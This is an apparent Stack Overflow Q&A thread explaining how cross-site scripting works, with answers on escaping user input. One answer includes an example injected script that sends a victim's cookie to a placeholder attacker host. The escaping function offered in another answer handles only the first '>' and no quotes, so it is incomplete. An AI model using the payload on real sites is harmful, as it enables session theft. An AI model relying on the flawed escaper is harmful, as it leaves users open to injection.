tags:

views:

781

answers:

5
+2  Q: 

How does XSS works

Can someone explain how XSS works in plain english? Maybe with an example. Googling didn't help much.

+2  A: 

this Wikipedia Entry was easy enough.

gimel  2008-10-27 06:15:36
+2  A: 

Cross Site Scripting basically is a security vulnerability of dynamic web pages where an attacker can create a malicious link to inject unwanted executable JavaScript into a Web site. The most usual case of this vulnerabilities occurs when GET variables are printed or echoed without filtering or checking their content.

When a victim clicks the link, the malicious code can then send the victim’s cookie away to another server, or it can modify the affected site, injecting forms, to steal usernames and passwords, and other phishing techniques.

Example of malicious link:

http://VulnerableHost/a.php?variable=<script>document.location='http://AttackersHost/cgi-bin/cookie.cgi%3Fdata='+document.cookie</script>

It's also common to encode the malicious code, for example in hex:

Malicious Link

CMS  2008-10-27 06:37:57
It's a good thing SO is filtering that! :P
Bob Somers  2008-10-27 06:50:50
Haha yes, this is a good example of proper escaping. Nice job Stack Overflow! :)
Jason  2009-10-23 14:12:07
+1  A: 

I'd consider Google Ads (or any other ad platform) as an example of XSS, athough probably not deemed an 'attack' if it's at the intent of the website author.

Ady  2008-10-27 06:53:46
+3  A: 

An XSS vulnerability exists whenever a string from outside your application can be interpreted as code.

For example, if you're generating HTML by doing this:

<BODY>
  <?= $myQueryParameter ?>
 </BODY>

then if the $myQueryParameter variable contains a <SCRIPT> tag then it will end up executing code.

To prevent an input from being executed as code, you need to escape content properly.

The above problem can be solved by realizing that the $myQueryParameter variable contains plain text, but you can't just go and put plain text into HTML and expect it to work.

So you need to convert plain text to HTML so you can put it into your HTML page. That process of converting a string in one language to another so that it can be embedded is escaping.

You can escape plain text to HTML with a function like:

function escapePlainTextToHTML(plainText) {
  return plainText.replace(/\0/g, '').replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/, '&gt;');
}
Mike Samuel  2009-01-09 23:42:08
+1  A: 

A good resource of possible XSS techniques to inject scripts. Can be useful for testing your site against some of these:

http://ha.ckers.org/xss.html

Jason  2009-10-23 14:12:52

related questions

Why does this remote script cause IE6 to hang?
HTTP input filter like mod_security for WebSphere?
Should I sanitize HTML markup for a hosted CMS?
HTML/Javascript app that runs on the filesystem, security issue
Gracefully closing a frame (toolbar) around an iframe
What's the best method for sanitizing user input with PHP?
How do you htmlencode using html agility pack?
XSS Blacklist - Is anyone aware of a reasonable one?
Do htmlspecialchars and mysql_real_escape_string keep my PHP code safe from injection?
What percentage of my time will be spent in user input verfication during web development?
How do you allow the usage of an <img> while preventing XSS?
What are the best practices for avoid xss attacks in a PHP site
How do use fckEditor safely, without risk of cross site scripting?
Will HTML Encoding prevent all kinds of XSS attacks?
Inform potential clients about security vulnerabilities?
Best Practice: Legitimate Cross-Site Scripting
Access to restricted URI denied code: 1012
How do you set up use HttpOnly cookies in PHP
When is it Best to Sanitize User Input?
How exactly do you configure httpOnlyCookies in ASP.NET?
How do you configure HttpOnly cookies in tomcat / java webapps?
Communicating between websites (using Javascript or ?)
Best regex to catch XSS (Cross-site Scripting) attack (in Java)?
Sanitising user input using Python
Catching SQL Injection and other Malicious Web Requests